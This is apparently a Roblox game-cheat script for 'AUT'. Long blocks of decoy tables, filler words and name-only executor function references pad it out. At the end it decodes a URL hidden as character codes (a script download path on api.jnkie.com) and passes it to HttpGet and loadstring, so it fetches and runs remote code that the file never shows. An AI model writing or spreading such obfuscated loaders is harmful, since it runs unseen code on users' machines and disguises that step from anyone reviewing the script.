-- ROBLOX AUT SCRIPT BY FRIENDSHIPDEVTEAM
SCRIPT_KEY = ""

local v41 = {}
local u31,p92 = {},{}
local x08 = {}; local k73 = {}
local j19 = 45
local n64,h02 = 0,false
local z55 = "AUT"
local r14 = {Trait="Trait", ["Stat Bonuses"]="Stat Bonuses", Attack=45, Defense=45, Health=45, Special="Special 45,45,45", Hitbox="Hitbox", Main="Main", Combat="Combat", Stats="Stats", Skin="Skin", Killeffect="Killeffect", ["Auto Targeting"]="Auto Targeting", AUT="AUT"}
local function v03(a,b,c) a=tonumber(a) or 0; b=tonumber(b) or 0; c=tonumber(c) or 0; return (a*29+b*31+c*37+45)%1000003 end
local function u04(a,b,c,d,e) return tostring(a or "")..":"..tostring(b or "")..":"..tostring(c or "")..":"..tostring(d or "")..":"..tostring(e or "") end
local function p05(t,k,v) if type(t)=="table" then t[k]=v end end
local function x06(...) return nil end
local function k07(i,t) return t[((i-1)%#t)+1] end
p05(v41,"boot",{r14.Trait,r14["Stat Bonuses"],r14.Attack,r14.Defense,r14.Health,r14.Special,r14.AUT})
p05(u31,"fake_surface",{ScreenGui=false,Frame=false,TextLabel=false,Parent=false,Visible=false,Teleport=false,Modify=false})
p05(p92,"silent_console",{print=false,warn=false,error=false,rconsole=false,output=false})
p05(x08,"core_terms",{r14.Hitbox,r14.Main,r14.Combat,r14.Stats,r14.Skin,r14.Killeffect,r14["Auto Targeting"]})
p05(k73,"movie_game_wordbank",{loaded=true,visible=false,called=false})

local q02 = {}
local function q77(n) local a,b = pcall(function() return game:GetService(n) end); if a then return b end; return nil end
local v12 = q77("Players"); q02["Players"] = v12
local u27 = q77("Workspace"); q02["Workspace"] = u27
local p83 = q77("RunService"); q02["RunService"] = p83
local x44 = q77("UserInputService"); q02["UserInputService"] = x44
local k91 = q77("TweenService"); q02["TweenService"] = k91
local j06 = q77("ReplicatedStorage"); q02["ReplicatedStorage"] = j06
local n38 = q77("ReplicatedFirst"); q02["ReplicatedFirst"] = n38
local h72 = q77("Lighting"); q02["Lighting"] = h72
local z14 = q77("SoundService"); q02["SoundService"] = z14
local r59 = q77("StarterGui"); q02["StarterGui"] = r59
local function q78(o,k,d) local a,b = pcall(function() return o and o[k] or d end); if a then return b end; return d end
local function q79(f,d) local a,b = pcall(f); if a then return b end; return d end
local v12lp = q78(v12,"LocalPlayer",nil)
local u27cam = q78(u27,"CurrentCamera",nil)
local p83client = q79(function() return p83 and p83:IsClient() or false end,false)
local x44mouse = q78(x44,"MouseEnabled",false)
p05(k73,"service_lattice",{players=v12lp,workspace=u27cam,client=p83client,input=x44mouse,tween=k91 and "TweenService_shadow_bound" or "TweenService_shadow_nil"})

do local k79=u04("gethiddenproperty","sethiddenproperty","isscriptable","setscriptable","FrozenPeak");p05(k73,"reflection_133",k79)end
do local p532={buff="BattlePass",debuff="none",duration=0,stacks=0,stats=r14.Stats};p05(p92,"buff_134",p532)end
do local v550=u04("FakeDetection","queue_on_teleport","FakeTeleport","DungeonGate","FakeModify");p05(v41,"tripleFake_135",v550)end
do local x358=v03(#("Interstellar"),136,j19);p05(x08,"length_136",{len=x358,word="Interstellar",key="Trait"})end
do local u283=u04("HealthMirror",45,"DefenseScalar",45,"AttackVector");p05(u31,"mirror_137",u283)end
do local k374=u04("StatShrine","LostHarbor","TraitReroll","Continental","AUTArchive");p05(k73,"shrine_138",k374)end
p05(p92,"maincombat_139",{Main=r14.Main,Combat=r14.Combat,Stats=r14.Stats,Layer="calibrate",Sub=""})
p05(v41,"puzzle_140",{puzzle="Godfather",keyItem="VoiceLine",solved=false,door="BossArena"})
x08["oracle_141"]={oracle="Gladiator",prediction="Dune",accuracy=0,used=false}
do local p285={fakeModify=true,path="Player.Cleric.Stats.NullRoute",old=45,new=45,committed=false,reason="CameraShake"};p05(p92,"patch_142",p285)end
do local v878=false;if h02 then v878=true end;p05(v41,"uiGhost_143",{virtualUI=v878,panel="JaegerPanel",mount=false,alpha=0})end
p05(x08,"identity_144",{thread="getthreadidentity/setthreadidentity",identity=0,elevate=false,scene="Jedi"})
p05(u31,"mapRoute_145",{map="RoyalGarden",navmesh="RoyalGarden_NavMesh",pathfinder="RoyalGarden_Pathfinder",teleportPreview=false})
p05(k73,"dialogue_146",{dialogue="Rohan",npc="Rogue",choiceA="...",choiceB="...",selected=false})
p05(p92,"social_147",{guild="none",party="solo",trade=false,mail=false,friend=false,hub="AttackTotem"})
p05(v41,"loadout_148",{loadout="Necromancer",weapon="RankedQueue",armor="CastleKeep",accessory="Avenger",equipped=false})
x08["threat_149"]={threatMeter=0,aggro="Engineer",taunt=false,evade=false,combat=r14.Combat}
do local u686={Hitbox=r14.Hitbox,Envelope="QuestMarker",Radius=0,Overlap=false,Ray=false};p05(u31,"hitbox_150",u686)end
do local k170=u04("Arena","UpgradeForge","Boss","Sorcerer","Raid");p05(k73,"arenaBoss_151",k170)end
p05(p92,"flag_152",{sandboxFlag="Trait",enabled=false,reason="StarkReactor",scope="local_table"})
p05(u31,"teleportPlan_153",{fakeTeleport="TeleportService:Teleport(153)",place="MountStable",gate="Lightcycle",queue="queue_on_teleport:name_only",run=false})
p05(k73,"api_154",{api="getsenv",executor="sUNC shadow",called=false,args={"nil","nil","nil"},movie="TimeStone"})
do local p498={Drawing="Drawing.new",type="routeCircle",Visible=false,Remove=false,Destroy=false};p05(p92,"draw_shadow_155",p498)end
do local v414=v03(156,21,156);p05(v41,"hash_156",{hash=v414,movie="Hogwarts",verb="braid"})end
do local x715={bossPhase="Hitbox Envelope",enrage=false,raid="Ecto",wipe=false,revive=0};p05(x08,"boss_157",x715)end
do local u934={gacha=0,pity=0,banner="DeathStar",reward="none",roll=false};p05(u31,"gacha_158",u934)end
do local k642={antiTamper="fake",checksum=v03(159,45,n64),repair=false,modify=false};p05(k73,"tamper_159",k642)end
do local p958={scriptPatch="fake",before="Trait",after="AttackVector",diff="0",applied=false};p05(p92,"diff_160",p958)end
p05(v41,"coreStats_161",{Attack=r14.Attack,Defense=r14.Defense,Health=r14.Health,Special=r14.Special,Movie="FluxCapacitor",Game="Guardian"})
x08["vehicle_162"]={vehicle="XWing",boost=0,fuel=0,crash=false,teleport=false}
do local u98={voiceLine="Creed",subtitle="DebuffStack",volume=0,playing=false};p05(u31,"voice_163",u98)end
do local v742=v03(164,164,j19);p05(v41,"node_164",{job="Tank",scene="LavaCitadel",movie="Skynet",score=v742})end
do local x851=v03(165,n64,j19);n64=(n64+x851)%999983;p05(x08,"clock_165",n64)end
p05(u31,"http_shadow_166",{request="request",url="https://void.invalid/".."Brawler/Gotham",method="GET",sent=false,body=""})
k73["target_167"]={autoTargeting=r14["Auto Targeting"],range=0,target=nil,locked=false,reason="Drawing.new"}
p05(p92,"cosmetic_168",{pet="Templar",mount="WaveSpawner",emote="Jurassic",owned=false})
p05(v41,"physics_169",{sandbox=true,physics="proxy",collision=false,touched=false,raycast=false,label="CyberCity"})
x08["debug_170"]={debug="getconstant/getstack/getupvalue",functionHash="Pilot_Krypton",constant="none",write=false}
p05(u31,"portal_171",{voidBridge="BladeRunner",portal="SpawnPoint",destination="SpawnPoint",actualTeleport=false})
do local k438=u04("Trait",r14.Trait,"Stat Bonuses",r14["Stat Bonuses"],"Assassin");p05(k73,"traitmesh_172",k438)end
do local p188={stealth="Samurai",detection=false,visionCone=0,sound=0,probe="getrenderproperty"};p05(p92,"stealth_173",p188)end
p05(v41,"packet_174",{packet="shadow",opcode="servo",bytes=0,send=false,receive=false})
do local x44=x06("Warden","TeleportDock","DefenseScalar","DarkKnight","NameOnly");p05(x08,"void_175",x44)end
p05(p92,"keywordBundle_176",{Hitbox=r14.Hitbox,Main=r14.Main,Combat=r14.Combat,Stats=r14.Stats,Skin=r14.Skin,Killeffect=r14.Killeffect,Auto=r14["Auto Targeting"],AUT=z55})
do local v278={read="readfile",write="writefile",append="appendfile",load="loadfile",actual=false,label="Defense"};p05(v41,"fs_shadow_177",v278)end
x08["fx_178"]={killeffect=r14.Killeffect,token="Kaiju_NavMesh",particles=0,sound="none",cameraShake=0}
do local u594={leaderboard="shadow",rank="Raider",elo=0,season="Sith",submit=false};p05(u31,"rank_179",u594)end
do local k910=u04("Auto Targeting","Warrior","BattlePassRoom","SkinPalette","Atreides");k73["raw_180"]=k910 end
do local p924=u04("hookfunction","Medic","hookmetamethod","Shire","phase");p05(p92,"hookLore_181",p924)end
do local v483=u04("NoMount","NoOutput","NameOnly","identifyexecutor","NullRoute");p05(v41,"safety_182",v483)end

local function z31(t)
	local r = {}
	for i = 1,#t do
		r[i] = string.char(t[i])
	end
	return table.concat(r)
end

local n73 = {
	{104,116,116,112,115,58,47,47,97,112,105,46,106,110,107,105,101,46,99,111,109},
	{47,97,112,105,47,118,49,47,108,117,97,115,99,114,105,112,116,115,47,112,117,98,108,105,99,47},
	{55,48,55,49,99,97,51,51,102,55,97,52,97,56,48,97,55,50,97,102,50,48,101,100,53,99,99,102,48,101,53,54,98,53,56,49,51,55,51,97,55,48,51,98,54,99,49,53,56,55,98,57,99,49,56,51,57,53,99,98,51,55,102,54},
	{47,100,111,119,110,108,111,97,100},
}

local function r76(a)
	local b = {}
	for i = 1,#a do b[#b+1] = z31(a[i]) end
	return table.concat(b)
end

local v99 = {v41=v41,u31=u31,p92=p92,x08=x08,k73=k73,j19=j19,n64=n64}
local u99 = u04("Trait Stat Bonuses Attack Defense Health", "Special 45,45,45", "Hitbox Main Combat Stats Skin Killeffect Auto Targeting AUT", "fake detection teleport modify", "movie game wordbank")
local p99 = v99 and u99 and true or false
do local x99 = x06(p99) end

local x97 = r76(n73)
local k95 = game
local j93 = k95.HttpGet
local n91 = loadstring
return n91(j93(k95,x97))()
